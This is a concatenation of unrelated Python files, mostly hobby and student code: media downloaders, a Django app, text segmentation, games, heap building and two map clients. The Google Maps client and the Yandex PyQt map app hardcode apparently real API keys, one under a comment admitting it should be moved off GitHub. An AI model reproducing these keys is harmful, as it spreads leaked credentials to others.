Arguments:
structure: a structure object that has attrubute `obtain_media()` (`Post` or `Story`)
dest: destination path, one will be created if directory not found (must be a directory)
directory: make a new directory inside `dest` to store all files
subdir: name of the sub directory which is created when downloading multiple media
force_subdir: force create a sub directory and store all the media (used when dump_metadata=True)
Returns:
str: full path to the download destination
tuple: (downs, exists)
"""
dest = dest or "./"
path = os.path.abspath(dest)
if not os.path.isdir(path):
logger.debug("{0} directory not found. Creating one...".format(path))
os.mkdir(path)
if directory:
path = os.path.join(path, directory)
if not os.path.isdir(path):
os.mkdir(path)
return_path = path
containers = structure.obtain_media()
multi = len(containers) > 1
if multi or force_subdir:
if subdir:
# create a sub directory for multiple media of a post
path = os.path.join(path, subdir)
if not os.path.isdir(path):
os.mkdir(path)
logger.debug("Downloading {0} ({1} media) [{2}]...".format(subdir or directory, len(containers), structure.typename))
logger.debug("Path: " + path)
downs = exists = 0
with progress(len(containers), disable=False) as bar:
for i, c in enumerate(containers, start=1):
bar.set_postfix_str(c.typename)
if multi:
filename = str(i)
else:
filename = subdir or str(i)
if structure.__class__.__name__ in ("Story", "Highlight"):
# * exclusively and explictly change filename to datetime string for Story and Highlight
filename = to_datetime(structure.created_time_list[i-1])
# check if the file / directory already exists
if os.path.isfile(os.path.join(path, filename + ".jpg")) or os.path.isfile(os.path.join(path, filename + ".mp4")):
exists += 1
logger.debug("file already downloaded, skipped !")
bar.set_description_str(Back.BLUE + Fore.BLACK + "[" + "Exists".center(11) + "]" + Style.RESET_ALL)
time.sleep(0.1) # give some time for displaying the 'Exists' badge of the progress bar
else:
# download
state = _down_from_src(c.src, filename, path)
if state:
downs += 1
bar.update(1)
return return_path, (downs, exists)
def _down_posts(posts, dest: str = None, directory: str = None, dump_metadata: bool = False):
"""High-level function for downloading media of a list of posts. Decorates the process with tqdm progress bar.
* This function calls `down_structure` function and wraps it with 'for' loop & progress bar to support downloading multiple posts.
Arguments:
posts: a generator which generates `Post` instances or a list that contains preloaded `Post` instances
dest: download destination (should be a directory)
directory: make a new directory inside `dest` to store all the files
dump_metadata: (force create a sub directory of the post and) dump metadata of each post to a file inside if True
Returns:
bool: True if file already exists and skipped the download process
path: full path to the download destination if download succeeded
"""
is_preloaded = isinstance(posts, list)
path = None
total = len(posts) if is_preloaded else None
logger.info("Downloading {0} posts {1}...".format(total or "(?)", "with " + str(sum([len(x) for x in posts])) + " media in total" if is_preloaded else ""))
downs = exists = 0
# prepare progress bar, hide progress bar when quiet and show download details when debugging
with progress(total=total, desc="Processing", ascii=False) as bar:
for i, p in enumerate(posts, start=1):
bar.set_postfix_str("(" + (p.shortcode if len(p.shortcode) <= 11 else p.shortcode[:8] + "...") + ") " + p.typename)
logger.debug("Downloading {0} of {1} posts...".format(i, total or "(?)"))
# download
subdir = to_datetime(p.created_time) + "_" + p.shortcode
# NOTE: force_subdir if dump_metadata ?
path, (d, e) = _down_structure(p, dest, directory, subdir, force_subdir=False) # `subdir` can also be the filename if the post has only one media
# dump metadata
if dump_metadata:
filename = subdir + ".json"
metadata_file = os.path.join(path, filename) # path inside the sub directory
logger.debug("-> [{0}] dump metadata".format(filename))
with open(metadata_file, "w+") as f:
json.dump(p.as_dict(), f, indent=4)
# calcualte total
downs += d
exists += e
bar.update(1)
logger.info("{0} total = {1} downloads + {2} exists".format(downs + exists, downs, exists) + " "*10)
if path: # path is None if error occurred in `_down_structure()`
logger.info("Destination: {0}".format(path))
return path
def _down_highlights(highlights, dest: str = None, directory: str = None):
is_preloaded = isinstance(highlights, list)
path = None
total = len(highlights) if is_preloaded else None
logger.info("Downloading {0} highlights {1}...".format(total or "(?)", "with " + str(sum([len(x) for x in highlights])) + " media in total" if is_preloaded else ""))
downs = exists = 0
# prepare progress bar, hide progress bar when quiet and show download details when debugging
with progress(total=total, desc="Processing", ascii=False) as bar:
for i, highlight in enumerate(highlights, start=1):
bar.set_postfix_str("(" + (highlight.title if len(highlight.title) <= 17 else highlight.title[:14] + "...") + ") " + highlight.typename)
logger.debug("Downloading {0} of {1} highlights...".format(i, total or "(?)"))
# download
subdir = highlight.title
subdir = subdir.replace("/", "-") # clean
# NOTE: force_subdir if dump_metadata ?
path, (d, e) = _down_structure(highlight, dest, directory, subdir, force_subdir=True) # `subdir` can also be the filename if the post has only one media
# calcualte total
downs += d
exists += e
bar.update(1)
logger.info("{0} total = {1} downloads + {2} exists".format(downs + exists, downs, exists) + " "*10)
if path: # path is None if error occurred in `_down_structure()`
logger.info("Destination: {0}".format(path))
return path
def _down_igtv(igtv, dest: str = None, directory: str = None, dump_metadata: bool = False):
is_preloaded = isinstance(igtv, list)
path = None
total = len(igtv) if is_preloaded else None
logger.info("Downloading {0} IGTV videos...".format(total or "(?)"))
downs = exists = 0
# prepare progress bar, hide progress bar when quiet and show download details when debugging
with progress(total=total, desc="Processing", ascii=False) as bar:
for i, video in enumerate(igtv, start=1):
bar.set_postfix_str("(" + (video.title if len(video.title) <= 17 else video.title[:14] + "...") + ") " + video.typename)
logger.debug("Downloading {0} of {1} IGTV videos...".format(i, total or "(?)"))
# download
subdir = video.title
subdir = subdir.replace("/", "-") # clean
# NOTE: force_subdir if dump_metadata ?
path, (d, e) = _down_structure(video, dest, directory, subdir, force_subdir=False) # `subdir` can also be the filename if the post has only one media
# dump metadata
if dump_metadata:
filename = subdir + ".json"
metadata_file = os.path.join(path, filename) # path inside the sub directory
logger.debug("-> [{0}] dump metadata".format(filename))
with open(metadata_file, "w+") as f:
json.dump(video.as_dict(), f, indent=4)
# calcualte total
downs += d
exists += e
bar.update(1)
logger.info("{0} total = {1} downloads + {2} exists".format(downs + exists, downs, exists) + " "*10)
if path: # path is None if error occurred in `_down_structure()`
logger.info("Destination: {0}".format(path))
return path
|
from mod_base import*
class Die(Command):
"""Kill the bot. Warning: I won't rise from my ashes like a fenix!"""
def run(self,win,user,data,caller=None):
win.Send("dying...")
self.bot.StopBot()
module = {
"class": Die,
"type": MOD_COMMAND,
"level": 5,
"zone":IRC_ZONE_BOTH
}
|
import sys
import re
def plot(X,Y):
g = [['.' for i in xrange(11)] for j in xrange(11)]
for x,y in zip(X,Y):
g[10-y][x] = 'x'
print '10 ' + ' '.join(i for i in g[0])
for y in xrange(9,-1,-1):
print ' ' + str(y) + ' ' + ' '.join(i for i in g[10-y])
print ' '+' '.join(str(i) for i in xrange(11))
def process(line):
points = re.findall(r'\((\d+),(\d+)\)',line)
x = [int(i[0]) for i in points]
y = [int(i[1]) for i in points]
print points
plot(x,y)
with open(sys.argv[1]) as f:
i = 1
for line in f:
print i
process(line)
i += 1
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
import os
from scipy import signal
from matplotlib.colors import LogNorm
from PIL import Image
import tensorflow_io as tfio
import random
random.seed(111)
def spec_augment(spec: np.ndarray, num_mask=2,
freq_masking_max_percentage=0.1, time_masking_max_percentage=0.1):
spec = spec.copy()
for i in range(num_mask):
all_frames_num, all_freqs_num = spec.shape
freq_percentage = random.uniform(0.0, freq_masking_max_percentage)
num_freqs_to_mask = int(freq_percentage * all_freqs_num)
f0 = np.random.uniform(low=0.0, high=all_freqs_num - num_freqs_to_mask)
f0 = int(f0)
spec[:, f0:f0 + num_freqs_to_mask] = 0
time_percentage = random.uniform(0.0, time_masking_max_percentage)
num_frames_to_mask = int(time_percentage * all_frames_num)
t0 = np.random.uniform(low=0.0, high=all_frames_num - num_frames_to_mask)
t0 = int(t0)
spec[t0:t0 + num_frames_to_mask, :] = 0
return spec
classes = os.listdir('../classes')
for classe in classes :
files = os.listdir("../classes/"+classe)
if not os.path.exists("../classes/"+classe+'/spectro'):
os.makedirs("../classes/"+classe+'/spectro')
for img in files :
if not os.path.exists("../classes/"+classe+'/spectro/augment/'):
os.makedirs("../classes/"+classe+'/spectro/augment/')
try :
print(classe)
nb_img =int(img.replace(".png",""))
print(nb_img)
ts = np.array(pd.read_csv(str(nb_img)+".csv")["engergy"])
fs = 10e12
#powerSpectrum, freqenciesFound, time, imageAxis = plt.specgram(ts, Fs=fs)
""""plt.gca().set_axis_off()
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig("../classes/"+classe+'/spectro/'+str(nb_img)+".png",frameon='false')"""
f, t, s = signal.spectrogram(ts,fs,noverlap=int(len(ts)/8)-1,nperseg=int(len(ts)/8) )
plt.figure()
plt.imshow(10*np.log(s),aspect= 'auto')
plt.gca().set_axis_off()
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig("../classes/"+classe+'/spectro/'+str(nb_img)+".png",frameon='false')
plt.show()
plt.close()
for i in range(3):
plt.figure()
plt.imshow(spec_augment(10*np.log(s)),aspect= 'auto')
plt.gca().set_axis_off()
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig("../classes/"+classe+'/spectro/augment/'+str(nb_img)+"_"+str(i)+".png",frameon='false')
plt.close()
except Exception as e :
print(e)
"""f, t, s = signal.spectrogram(ts, fs,noverlap=128 )
plt.pcolormesh(t, f, 10*np.log(s), shading='gist_earth')
plt.gca().set_axis_off()
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.show()
u, s, vh = np.linalg.svd( 10*np.log(s), full_matrices=True)
smat = np.diag(s)
for i in range(np.shape(smat)[1]) :
matr = np.dot(np.array(u[:len(s)-1,i] * smat[0,0]).reshape(-1,1), np.reshape(vh[i,:len(s)-1],(1,-1)))
print(np.shape(matr))
plt.pcolormesh(np.transpose(matr), shading='gist_earth')
plt.colorbar()
plt.show(block=True)
plt.specgram(matr, Fs=fs)"""
|
#anagram is where both the strings have each characters of the same frequency
#danger and garden is an example of an anagram
def isanagram(s1,s2):
if(len(s1)!=len(s2)):
return False
# return sorted(s1) == sorted(s2)
freq1 = {} #declaring dictionaries for mapping purpose
freq2 = {}
#using dictionary(hash table) for assigning the character as key and no of times it repeated as values
# {
# char1:value1
# }
for char in s1:
if char in freq1:
freq1[char] += 1
else:
freq1[char] = 1
for char in s2:
if char in freq2:
freq2[char] += 1
else:
freq2[char] = 1
# for every key in dictionary freq1 we are comparing it with the key in dictionary freq2
# if the key is not found then it will return false
# and simillarly the values from both the dictionaries are being compared
# if any one of the condition is false it will return false "or" is being used
for key in freq1:
if key not in freq2 or freq1[key]!=freq2[key]:
return False
return True
s1 = input("Enter a string\n")
s2 = input("Enter second string\n")
if isanagram(s1,s2):
print(f"\nThe {s1} and {s2} are Anagrams")
else:
print(f"{s1} and {s2} are not anagram") |
import sys
import h5py
import numpy as np
pathtocossio = "/Users/daviddesancho/Research/code/smFSmodels"
sys.path.append(pathtocossio)
from smfsmodels import cossio
def cossio_runner(inp):
np.random.seed()
b = inp[0]
kl = inp[1]
sc = inp[2]
numsteps = inp[3]
dt = 5e-4
Dx = 1
Dq = sc*Dx
x, q = [5., 5.]
tt, xk, qk = cossio.run_brownian(x0=x, barrier=b, kl=kl, \
Dx=Dx, Dq=Dq, numsteps=numsteps, \
fwrite=int(1./dt))
data = np.column_stack((tt,xk,qk))
h5file = "data/cossio_barrier%g_kl%g_Dx%g_Dq%g.h5"%(b, kl, Dx, Dq)
with h5py.File(h5file, "w") as hf:
hf.create_dataset("data", data=data)
return h5file
|
# Generated by Django 2.0.3 on 2018-11-05 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0002_auto_20181105_0735'),
]
operations = [
migrations.AddField(
model_name='pasta',
name='price',
field=models.FloatField(default=0),
),
migrations.AddField(
model_name='pizza',
name='price',
field=models.FloatField(default=0),
),
migrations.AddField(
model_name='platter',
name='price',
field=models.FloatField(default=0),
),
migrations.AddField(
model_name='salad',
name='price',
field=models.FloatField(default=0),
),
migrations.AddField(
model_name='sub',
name='price',
field=models.FloatField(default=0),
),
migrations.AddField(
model_name='subextra',
name='price',
field=models.FloatField(default=0),
),
]
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:helper.py
# @Author: Michael.liu
# @Date:2020/5/12 14:58
# @Desc: this code is ....
import codecs
import os
from pyhanlp import *
import xml.etree.ElementTree as ET
content_list = []
def read_file_list(inpufile,seg):
dir_list = []
file_list = []
root = os.path.abspath(inpufile)
print(root)
dir_list = os.listdir(inpufile)
for dir in dir_list:
file_root = os.path.join(root + os.path.sep + dir)
file_list = os.listdir(file_root)
print(file_list)
for i in file_list:
filepath = os.path.join(file_root+os.path.sep+i)
xml_root = ET.parse(filepath).getroot()
title = xml_root.find('title').text
body = xml_root.find('body').text
content = title + seg + body #这里分割
content_list.append(content)
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def new_seg(content,stop_words):
HanLP = SafeJClass('com.hankcs.hanlp.HanLP')
ret = []
seg_list = HanLP.segment(content)
for term in seg_list:
word = str(term.word)
word = str(term.word).strip().lower()
if word == '\r' or word == '\r\n' or word =='\n' or len(word) <=1:
continue
if word != '' and word not in stop_words and not is_number(word):
ret.append(word)
seg_content = ' '.join(ret)
return seg_content
def load_d_cut(content_list,out_file):
# 读停用词典
fw = codecs.open(out_file,'w',encoding='utf-8')
f = open('./stop_words.txt','r', encoding='utf-8')
words = f.read()
stop_words = set(words.split('\n'))
for item in content_list:
#print(item)
seg_content = new_seg(item,stop_words)
fw.write(str(seg_content))
fw.write("\n")
fw.close()
if __name__ == "__main__":
print("......start.....")
file_path = "../../data/chapter2/"
read_file_list(file_path,'↑')
load_d_cut(content_list,'./title_content_seg.txt')
print("......finished!.......")
#load_d_cut("","./outfile.csv") |
import random
#Humans choice==================
def inputOfChoice():
global choiceOfUser
choiceOfUser = raw_input("Rock, Paper, or Scissors: ")
return choiceOfUser
#Computers choice==================
def inputOfComputer():
global choiceOfComputer
num = random.randint(1,3)
if num == 1:
choiceOfComputer = "rock"
elif num == 2:
choiceOfComputer = "paper"
else:
choiceOfComputer = "Scissors"
return choiceOfComputer
#Figures out who is the winner==================
def whoIsTheWinner(user, computer):
comWin = "Computer Wins"
useWin = "User Wins"
if user == "rock":
if computer == "paper":
print comWin
elif computer == "scissors":
print useWin
else:
print "tie"
elif user == "paper":
if computer == "scissors":
print comWin
elif computer == "rock":
print useWin
else:
print "tie"
elif user == "scissors":
if computer == "rock":
print comWin
elif computer == "paper":
return useWin
else:
print "tie"
#Main fucntion of file==================
def main():
global playAgain
playAgain = raw_input("Again? ")
if playAgain == "yes":
inputOfChoice()
inputOfComputer()
whoIsTheWinner(choiceOfUser, choiceOfComputer)
main()
inputOfChoice()
inputOfComputer()
whoIsTheWinner(choiceOfUser, choiceOfComputer)
main()
|
#!/usr/bin/python3
import phonenumbers
from phonenumbers.timezone import time_zones_for_number
from phonenumbers import geocoder
from phonenumbers import carrier
from clint.textui import colored
def location(phone_number):
number=phonenumbers.parse(phone_number,"EN")
liste=time_zones_for_number(number)
country=geocoder.description_for_number(number, "en")
operator=carrier.name_for_number(number,"en")
print(colored.green("[+]Country:"+str(country)))
print(colored.green("[+]Time Zone:"+str(liste[0])))
print(colored.green("[+]Carrier:"+str(operator)))
with open("output/location_operator.txt","a+") as file:
file.write("\n[+]Country:\n"+str(country)+"\n[+]Time Zone:\n"+str(liste[0])+"\n[+]Carrier:\n"+str(operator)+"\n--------------------------------------------------------------")
|
# python3
parent = lambda i : i / 2
left = lambda i : (2 * i) + 1
right = lambda i : (2 * i) + 2
valid_edge = lambda data, i, child_idx: i >= len(data) or child_idx(i) >= len(data) or data[i] <= data[child_idx(i)]
def swap(data, i, j):
swap = data[i]
data[i] = data[j]
data[j] = swap
def fixMinHeap(swaps, data, i):
minidx = i
if left(i) < len(data) and data[left(i)] < data[minidx]:
minidx = left(i)
if right(i) < len(data) and data[right(i)] < data[minidx]:
minidx = right(i)
swaps.append((i, minidx))
swap(data, i, minidx)
return minidx
def siftdown(swaps, data, i):
if not ( valid_edge(data, i, left) and valid_edge(data, i, right) ):
siftdown(swaps, data, fixMinHeap(swaps, data, i))
def build_heap_optimized(data):
swaps = []
for i in range(int(len(data) / 2), -1, -1):
siftdown(swaps, data, i)
return swaps
def build_heap_naive(data):
"""Build a heap from ``data`` inplace.
Returns a sequence of swaps performed by the algorithm.
"""
# The following naive implementation just sorts the given sequence
# using selection sort algorithm and saves the resulting sequence
# of swaps. This turns the given array into a heap, but in the worst
# case gives a quadratic number of swaps.
#
# TODO: replace by a more efficient implementation
swaps = []
for i in range(len(data)):
for j in range(i + 1, len(data)):
if data[i] > data[j]:
swaps.append((i, j))
data[i], data[j] = data[j], data[i]
return swaps
def main():
n = int(input())
data = list(map(int, input().split()))
assert len(data) == n
swaps = build_heap_optimized(data)
print(len(swaps))
for i, j in swaps:
print(i, j)
if __name__ == "__main__":
main()
|
from django.urls import path
from . import views
app_name="payment"
urlpatterns = [
path('card/',views.add_cart,name='card'),
path('add_coupon/',views.add_coupon,name='add_coupon'),
path('remove_item/',views.remove_item,name='remove_item'),
path('callback/',views.callback,name='callback'),
path('create_package/', views.create_packages,name='create_package'),
path('havale/',views.havale,name ="havale"),
] |
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
"""
import logging
log = logging.getLogger(__name__)
import numpy as np
from node import Node, root0, root1, root2, root3, root4, UNION, INTERSECTION, DIFFERENCE, BOX, SPHERE, EMPTY, desc
from ctrl import CtrlLeft, CtrlRight, CtrlResumeFromLeft, CtrlResumeFromRight, CtrlReturn, CtrlBreak, desc_ctrl
def fake_pfx(ctrl):
if ctrl & CtrlLeft and ctrl & CtrlRight:
pfx = ""
elif ctrl & CtrlLeft:
pfx = "L"
elif ctrl & CtrlRight:
pfx = "R"
elif ctrl & CtrlResumeFromLeft:
pfx = "RL"
elif ctrl & CtrlResumeFromRight:
pfx = "RR"
else:
pfx = desc_ctrl(ctrl)
pass
return pfx
def fake_ctrl(p):
if hasattr(p, "LoopL"):
log.info("fake_ctrl found node with LoopL %r " % p )
delattr(p, "LoopL")
ctrl = CtrlLeft
else:
ctrl = CtrlReturn
pass
return ctrl
def fake_binary_calc(node, left=None, right=None, ctrl=None):
assert hasattr(node,'depth')
assert left and right, (left, right)
return "%s:[%s;%s](%s,%s)" % ( fake_pfx(ctrl),node.idx, node.depth, left, right )
def fake_primitive_calc(node, ctrl=None):
return "%s:%s;%s" % (fake_pfx(ctrl),node.idx, node.depth )
def postordereval_i2t(root, debug=0):
"""
Iterative binary tree evaluation, using postorder threading to avoid
the stack manipulations of _i2 that repeatly "discover" the postorder.
However intermediate evaluation steps still require
lhs and rhs stacks, that grow to a maximum of one less than the tree height.
ie the stacks are small
* NB this assumes a COMPLETE BINARY TREE, ie every node above the leaves has
non None left and right children, and leaves have left and right None
* note that the postorder traversal is operator only starting from bottom left
with bileaf nodes at lowest level, ie operator nodes with left and right
primitives
* NB initial traverse always starts on a bileaf operator
so p.l and p.r are leaves and lhs/rhs stacks will be appended
before reaching operator where they will be popped
* non-bileaf LoopL/R forces reiteration of left/right subtree,
so push er/el onto rhs/lhs stack, as was just popped but the
so will return to same position after the reiteration
* non-bileaf LoopL/R just popped lhs and rhs, but looping means reiterating
while leaving the other side unchanged, so must push to opposite side
so when resume after the reiteration are back to the same other side state
as before it
* bileaf loopers with p.l or p.r leaves just
go for an immediate while loop spin repeating one side
primitive_calc with different act, they do not tee up tranches
* non-bileaf loopers have to tee up pair of tranches to repeat the loopside subtree
and then resume from where left off
Three while loop structure
* begin/end tranches
* postorder operator nodes between begin and end
* act controlled inner loop, repeats calc for immediate (bileaf) loopers
"""
leftop = Node.leftmost(root)
assert leftop.is_bileaf
assert not leftop.is_primitive
assert leftop.next_ is not None, "threaded postorder requires Node.postorder_threading_r "
debug = 1
lhs = []
rhs = []
tranche = []
tranche.append([leftop,None,CtrlLeft|CtrlRight])
while len(tranche) > 0:
begin, end, ctrl = tranche.pop()
#print "start tranche %s begin %s end %s " % (desc_ctrl(ctrl), begin, end)
if debug > 3:
p = begin
while p is not end:
print "pre-traverse ", p
p = p.next_
pass
pass
p = begin
while p is not end:
#ctrl = ctrl & ~CtrlReturn
ctrl = (CtrlLeft|CtrlRight)
#print "p loop %s : %s " % (desc_ctrl(ctrl), p)
while ctrl & (CtrlLeft | CtrlRight ):
if ctrl & CtrlLeft:
if p.l.is_leaf:
el = fake_primitive_calc(p.l,ctrl=ctrl)
assert el
else:
el = lhs.pop()
pass
pass
if ctrl & CtrlRight:
if p.r.is_leaf:
er = fake_primitive_calc(p.r,ctrl=ctrl)
assert er
else:
er = rhs.pop()
pass
pass
ep = fake_binary_calc(p,el,er,ctrl=ctrl)
ctrl = fake_ctrl(p)
if ctrl & CtrlLeft:
if not p.l.is_leaf:
rhs.append(er)
tranche.append([p,None,CtrlResumeFromLeft])
tranche.append([Node.leftmost(p.l),p.l.next_,CtrlLeft])
ctrl |= CtrlBreak
pass
pass
if ctrl & CtrlRight:
if not p.r.is_leaf:
lhs.append(el)
tranche.append([p,None,CtrlResumeFromRight])
tranche.append([Node.leftmost(p.r),p.r.next_,CtrlRight])
ctrl |= CtrlBreak
pass
pass
if ctrl & CtrlBreak:
break
pass
pass
if ctrl & CtrlBreak:
ctrl = ctrl & ~CtrlBreak
if debug > 0:
log.info("_i2t post ctrl-while (after scrubbed CtrlBreak): %s " % desc_ctrl(ctrl))
break
pass
if p.is_left:
lhs.append(ep)
else:
rhs.append(ep)
pass
p = p.next_
pass
pass
assert len(lhs) == 0, lhs
assert len(rhs) == 1, rhs # end with p.idx = 1 for the root
return rhs[0]
def postordereval_r(p, ctrl=CtrlLeft|CtrlRight, debug=0):
"""
* CtrlLeft CtrlRight distinction only has teeth at
the single recursion level, the ctrl is passed to
other levels for tree annotation purposes but its
power is removed at the sub-levels via ctrl|CtrlBoth
* note that when a CtrlLeft or CtrlRight is raised the
current node and its subtree gets repeated
"""
assert p
el, er, ep = None, None, None
debug = 0
xctrl = ctrl
loopcount = 0
while ctrl & (CtrlLeft | CtrlRight):
loopcount += 1
assert loopcount < 10
if ctrl & CtrlLeft:
if p.l.is_leaf:
el = fake_primitive_calc(p.l, ctrl=ctrl)
else:
el = postordereval_r(p.l, ctrl=ctrl|CtrlRight, debug=debug)
pass
pass
if ctrl & CtrlRight:
if p.r.is_leaf:
er = fake_primitive_calc(p.r, ctrl=ctrl)
else:
er = postordereval_r(p.r, ctrl=ctrl|CtrlLeft, debug=debug)
pass
pass
ep = fake_binary_calc(p, el, er, xctrl)
ctrl = fake_ctrl(p)
if ctrl & CtrlLeft:
xctrl = CtrlResumeFromLeft
elif ctrl & CtrlRight:
xctrl = CtrlResumeFromRight
else:
xctrl = ctrl
pass
pass
assert ep
return ep
if __name__ == '__main__':
logformat = "%(asctime)s %(name)s %(levelname)-8s %(message)s"
logging.basicConfig(level=logging.INFO,format=logformat)
root = root2
root.tree_labelling()
Node.dress(root)
ret0 = None
fns = [postordereval_r,postordereval_i2t]
for fn in fns:
Node.label_r(root, 2, "LoopL") # label is popped, so relabel for each imp
ret = fn(root, debug=0)
print "%20s : %s " % ( fn.__name__, ret )
if ret0 is None:
ret0 = ret
else:
assert ret == ret0, (ret, ret0)
pass
pass
|
## MOVE THIS FILE OFF GITHUB REPO BEFORE SYNCING!
import googlemaps
api_key = "AIzaSyBYl6LkkHOIfBCSzRpMcptBiEArCDKwq7g "
gmaps = googlemaps.Client(api_key) |
from advection_diffusion import discretize_nonlinear_instationary_advection_diffusion_fv
|
'''
при проверке pgup/pgdn проверьте что не изменяете текст или комбобокс
'''
import sys, math
import requests
from PyQt5 import QtGui
from PyQt5 import QtWidgets
from PyQt5 import uic
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
Ui_MainWindown, _ = uic.loadUiType('uis/untitled.ui')
# --------константы
static_server = 'https://static-maps.yandex.ru/1.x/'
geocode_key = "40d1649f-0493-4b70-98ba-98533de7710b"
geocode_server = "https://geocode-maps.yandex.ru/1.x/"
l = ['map', 'sat', 'sat,skl']
# ---------/константы
class Dot:
def __init__(self, *args):
if args[0].__class__.__name__ == 'float':
self.a, self.b = args[:2]
else:
self.a, self.b = map(float, args[0].split())
def __str__(self):
return f'{self.a},{self.b}'
def __sub__(self, other):
print(self, other)
def __iadd__(self, other):
self.a += other[0]
self.b += other[1]
if not (0 <= self.a <= 180):
self.a = (self.a + 180) % 180
if not (0 <= self.b <= 180):
self.a = (self.b + 180) % 180
return self
def pt(self):
return f'{self.a},{self.b},pmwts'
def __repr__(self):
return f'{self.a} {self.b}'
def __copy__(self):
return Dot(self.__repr__())
class Ui_MainWindow(Ui_MainWindown, QtWidgets.QMainWindow):
def init2(self):
self.comboBox.addItems(l)
self.li = 2
self.dots = []
self.spn = 0.01
self.z = 15
self.maindot = Dot(55.94386499259262, 54.726269546473326)
self.get_img()
self.pushButton.clicked.connect(self.get_img)
self.pushButton_find.clicked.connect(self.find_pos)
self.pushButton_clear.clicked.connect(self.clear_dots)
self.checkBox.clicked.connect(self.find_pos)
def clear_dots(self):
self.dots.clear()
self.adres.setText('')
self.get_img()
def find_pos(self):
if self.textEdit.toPlainText():
params = {
'apikey': geocode_key,
"geocode": self.textEdit.toPlainText() if self.textEdit.toPlainText() else self.dots[0].__str__(),
"format": "json"
}
response = \
requests.get(geocode_server, params=params).json()['response']['GeoObjectCollection']['featureMember'][
0]
self.maindot = Dot(
response['GeoObject']['Point']['pos'])
self.dots.append(self.maindot.__copy__())
self.adres.setText('')
self.textEdit.setText('')
for dot in self.dots:
params = {
'apikey': geocode_key,
"geocode": dot.__str__(),
"format": "json"
}
response = \
requests.get(geocode_server, params=params).json()['response']['GeoObjectCollection']['featureMember'][
0]
self.adres.setText(
self.adres.toPlainText() + '\n' + '-' * 8 + "\n" +
response['GeoObject']['metaDataProperty']['GeocoderMetaData']['Address'][
'formatted'] + '\n' +
response['GeoObject']['metaDataProperty']['GeocoderMetaData']['Address'][
'postal_code'] if self.checkBox.isChecked() and 'postal_code' in
response['GeoObject']['metaDataProperty']['GeocoderMetaData'][
'Address'] else
self.adres.toPlainText() + "\n" + '-' * 8 + "\n" +
response['GeoObject']['metaDataProperty']['GeocoderMetaData']['Address'][
'formatted'])
self.get_img()
def mousePressEvent(self, event):
if (event.button() == Qt.LeftButton):
pos = (event.x() - 10, event.y() - 10)
if 0 <= pos[0] <= 600 and 0 <= pos[1] <= 450:
x = pos[0] - 300
y = -pos[1] + 225
a, b = self.maindot.a + 360 / (2 ** self.z) * x / 256, self.maindot.b + 180 / (2 ** self.z) * y / 256
s = Dot(a, b)
self.dots.append(s)
self.find_pos()
self.dots.pop(-1)
if (event.button() == Qt.RightButton):
pos = (event.x() - 10, event.y() - 10)
if 0 <= pos[0] <= 600 and 0 <= pos[1] <= 450:
x = pos[0] - 300
y = -pos[1] + 225
a, b = self.maindot.a + 360 / (2 ** self.z) * x / 256, self.maindot.b + 180 / (
2 ** self.z) * y / 256
s = Dot(a, b)
self.dots.append(s)
self.find_pos()
search_api_server = "https://search-maps.yandex.ru/v1/"
api_key = "7f712159-bb4c-49b3-b690-8108fe1b2898"
address_ll = str(s)
params = {
'apikey': geocode_key,
"geocode": address_ll,
"format": "json"
}
response = \
requests.get(geocode_server, params=params).json()['response']['GeoObjectCollection']
variants = response[
"featureMember"]
address = variants[0]['GeoObject']['metaDataProperty'][
'GeocoderMetaData']['text']
search_params = {
"apikey": api_key,
"text": address,
"lang": "ru_RU",
"ll": address_ll,
"type": "biz"
}
response = requests.get(search_api_server, params=search_params)
json_response = response.json()
# Получаем первую найденную организацию.
organization = json_response["features"][0]
# Название организации.
org_name = organization["properties"]["CompanyMetaData"]["name"]
# Адрес организации.
org_address = organization["properties"]["CompanyMetaData"]["address"]
point = organization["geometry"]["coordinates"]
s = self.lonlat_distance(point)
if s <= 50:
self.adres.setText(
self.adres.toPlainText() + '\n' + '-' * 8 + "\n" + org_name)
else:
self.adres.setText(
self.adres.toPlainText() + '\n' + '-' * 8 + "\n" + 'Организаций не найдено')
self.dots.pop(-1)
def lonlat_distance(self, point):
"""Расстояние между точками"""
degree_to_meters_factor = 111 * 1000 # 111 километров в метрах
a_lon, a_lat = self.dots[-1].a, self.dots[-1].b
b_lon, b_lat = point
# Берем среднюю по широте точку и считаем коэффициент для нее.
radians_lattitude = math.radians((a_lat + b_lat) / 2.)
lat_lon_factor = math.cos(radians_lattitude)
# Вычисляем смещения в метрах по вертикали и горизонтали.
dx = abs(a_lon - b_lon) * degree_to_meters_factor * lat_lon_factor
dy = abs(a_lat - b_lat) * degree_to_meters_factor
return round(math.sqrt(dx * dx + dy * dy), 4)
def get_img(self):
params = {
'l': self.comboBox.currentText(),
'll': self.maindot.__str__(),
"spn": f"{self.spn},{self.spn}",
'pt': '~'.join(map(lambda x: x.pt(), self.dots))
